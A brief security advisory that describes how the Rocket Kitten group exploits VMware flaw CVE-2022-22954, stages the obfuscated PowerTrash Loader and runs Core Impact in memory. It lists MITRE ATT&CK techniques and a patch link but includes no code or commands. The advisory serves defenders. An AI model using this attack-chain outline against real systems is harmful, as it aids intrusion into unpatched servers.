THREAT LEVEL: Red. For a detailed advisory, download the pdf file here An Iranian cyber espionage gang known as Rocket Kitten has began delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program. Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain. The MITRE ATT&CK TTPs commonly used by Rocket Kitten are: TA0001: Initial Access TA0002: Execution TA0006: Credential Access TA0009: Collection TA0011: Command and Control T1059 - Command and Scripting Interpreter T1189 - Drive-by Compromise T1555.003: Credentials from Password Stores: Credentials from Web Browsers T1105: Ingress Tool Transfer T1056.001: Input Capture: Keylogging T1566.001: Phishing: Spearphishing Attachmet T1566.003: Phishing: Spearphishing via Servicen T1204.002: User Execution: Malicious File Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://www.vmware.com/security/advisories/VMSA-2022-0011.html References https://blog.morphisec.com/vmware-identity-manager-attack-backdoor